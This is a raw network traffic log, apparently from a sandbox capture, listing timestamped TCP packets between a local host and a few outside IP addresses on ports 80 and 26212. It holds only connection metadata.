Sep 27, 2024 04:21:15.844907999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844918013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844928026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844949961 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844974995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845066071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845077038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845088005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845098019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845108032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845119953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845138073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845165968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845165968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845196962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845205069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845221996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845232010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845242977 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845257044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845268011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845294952 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845302105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845319986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845339060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845355034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845365047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845371962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845376968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845391989 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845428944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845453024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845463991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845474005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845515966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845515966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845578909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845590115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845598936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845609903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845642090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845673084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845685005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845695019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845705032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845716000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845726967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845732927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845738888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845753908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845777988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845803022 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845833063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845844030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845854044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845864058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845874071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845899105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845916033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.845920086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.845963001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.848681927 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:15.856745958 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:15.859669924 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859699965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859709024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859725952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859735966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859745026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859756947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859759092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859793901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859819889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859827995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859838963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859874964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859888077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859899998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859900951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859937906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859939098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859950066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859988928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.859994888 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.859998941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.860024929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.860050917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.861522913 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.867682934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867706060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867717028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867727041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867738962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867750883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867763996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867789030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867794991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867794991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867800951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867811918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867830992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867837906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867837906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867842913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867856979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867863894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867866993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867880106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867887974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867892027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.867919922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.867930889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.868854046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868904114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868913889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868923903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868935108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868942022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.868942022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.868977070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.868977070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.868983030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.868993998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869004965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869015932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869056940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869056940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869076014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869086981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869102955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869112015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869134903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869134903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869184971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869198084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869213104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869221926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869230986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869230986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869292021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869296074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869308949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869318008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869329929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869340897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869369984 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869369984 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869370937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869405031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869405031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869520903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869534969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869622946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869633913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869643927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869654894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869666100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869676113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869688034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869689941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869699001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869715929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869715929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869743109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869762897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869775057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869786024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869796991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869803905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869807959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869817019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869863033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869865894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869904041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869915009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869925976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.869940996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869940996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.869980097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870269060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870280981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870296001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870307922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870318890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870330095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870340109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870349884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870349884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870349884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870368004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870379925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870389938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870398045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870398998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870404005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870417118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870428085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870438099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870452881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870452881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870457888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870470047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870481014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.870493889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870493889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.870522976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.881001949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881032944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881043911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881086111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881094933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881108046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881108046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881119967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881131887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881141901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881145000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881181002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881220102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881231070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881242037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881253004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881263971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881275892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881282091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881299973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881304026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.881329060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.881355047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.900835037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900861025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900871992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900882959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900893927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900903940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900917053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.900919914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.900963068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.900995970 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.908889055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.908911943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.908925056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.908937931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.908948898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.908957958 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.908987999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909024954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909040928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909051895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909086943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909140110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909210920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909214020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909229040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909240961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909276009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909279108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909279108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909287930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909305096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909316063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909336090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909348011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909348011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909446955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909715891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909737110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909749031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909775972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909799099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909799099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909859896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909877062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909888029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909898043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909909964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909923077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909931898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909933090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.909953117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.909970045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.910126925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.910137892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.910149097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.910161972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.910173893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.910197973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.910226107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.916925907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.916954994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.916965961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.916975975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.916985989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.916996956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.917009115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.917018890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.917020082 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.917067051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.917085886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.928605080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928638935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928649902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928694010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928695917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928708076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928719044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928730011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928742886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928745985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928745985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928778887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928788900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928788900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928854942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928858042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928868055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928879023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928889990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.928900003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928942919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.928942919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.929553986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929568052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929585934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929596901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929608107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929617882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929629087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929635048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.929635048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.929642916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.929656982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.929693937 CEST	49725	80	192.168.2.5	185.215.113.117
